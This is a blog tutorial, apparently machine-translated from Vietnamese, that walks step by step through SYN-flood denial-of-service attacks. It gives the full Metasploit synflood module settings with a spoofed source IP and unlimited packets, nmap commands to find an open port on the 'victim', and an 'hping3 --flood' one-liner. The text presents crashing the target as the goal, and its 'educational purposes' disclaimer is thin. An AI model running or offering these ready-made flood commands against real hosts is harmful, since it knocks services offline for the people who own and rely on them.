Note: This article is for educational purposes only, please do not perform illegal actions and Anonyviet will not be responsible for any illegal actions of you.
Join the channel Telegram of the AnonyViet 👉 Link 👈 |
In this article, I will show you how to attack DoS or DDoS with Metasploit and Hping3 tools. The methods of implementation are quite simple and fast, in less than 3 minutes you can also create a quite powerful attack with the number of Packets sent very quickly, making the victim’s machine lead to a fatal situation. Sudden CPU surge, network glitches, or worse, crashes. So I recommend that you test with a sufficient number of packets. And now I will briefly introduce Metasploit and Hping3.
As a tool, fully known as Metasploit Framework, this is the most used exploit tool in the world. Not only that, it also helps security researchers to test penetrations and verify vulnerabilities, then they will evaluate vulnerabilities and raise security awareness. Metasploit is written in Ruby and many other languages such as: Python, C, … to create exploits and attacks on many different types of systems such as: Windows, Linux, WordPress, etc. So, I have finished my introduction to Metasploit already. In addition, you can also use Metasploit to cyber attack, hack Windows remotelyor computer hacking in Anonyviet’s articles ^^.
View all posts about How to use Metasploit to attack the system test.
Hping3
Is a network tool that can send ICMP/UDP/TCP packets (your choice) and display target replies just like Ping does with ICMP replies. In addition, it handles fragmentation and arbitrary packet sizes and contents, which can be used to transfer files according to supported protocols. Using Hping3, you can test firewalls, perform rogue port scans, test network performance using various protocols, and perform monitoring-like actions in other protocols. Hping3 is written in Tcl . language
Learn more about Hping3 here
To understand about DoS or DDoS attack you can read that article here. No more rambling on the matter ^^
Metasploit and Hping3 are the tools introduced in the CEH . program
DoS Attack with Metasploit
In this article, I will show you how to attack DoS using SYN Flood method. Anyone who does not understand this attack can find out here To perform the attack first open Terminal and enter the command msfconsole
Next we enter the command line use auxiliary/dos/tcp/synflood
in the Terminal bar of Metasploit
Next, you enter show options
to display custom settings
Here, we pay attention to the part:
NUM
: number of Packets to sendRHOSTS
: IP address of the victim’s computerRPORT
: Active port on the victim’s computerSHOST
: Any IP address you want to set. For example, any IP address I want to set is:172.0.0.1
SPORT
: Any port (This part is not needed)TIMEOUT
: Waiting time
The next step is to install this attack
set RHOSTS <ip máy tính nạn nhân>
set RPORT <cổng máy tính nạn nhân đang hoạt động>
set NUM <số lượng Packets cần gửi>
set SHOST <ip giả mạo>
set TIMEOUT <thời gian chờ>
Here I have the settings for the attack as follows
set rhosts 192.168.0.112
set rport 80
set num 0
set shost 172.0.0.1
set timeout 10000
To start the attack we just need to enter exploit
then press Enter to start the attack
Who do not know which port is active on the victim computer we will use Nmap to scan the port.
nmap -p <cổng cần quét> <ip máy tính nạn nhân>
or nmap -sV <ip nạn nhân>
Eg: nmap -p 443 192.168.0.112
or namp -sV 192.168.0.112
Here is the result of the attack
We can use tools Wireshark to capture the packets being sent. Now for the next part ^.^
DoS Attack with Hping3
The way to do it is quite fast and simple. With just a short command you have created a pretty powerful attack already.
The command will be as follows: hping3 <ip máy nạn nhân> --flood
and here are the results
Wow, if we combine both Metasploit and hping3 attack on one machine, I wonder what the result will be?
So I finished the instructions. And now hello and goodbye. Wish you have a good health and effective study!
You can read more articles How to write simple DDoS Tools in Python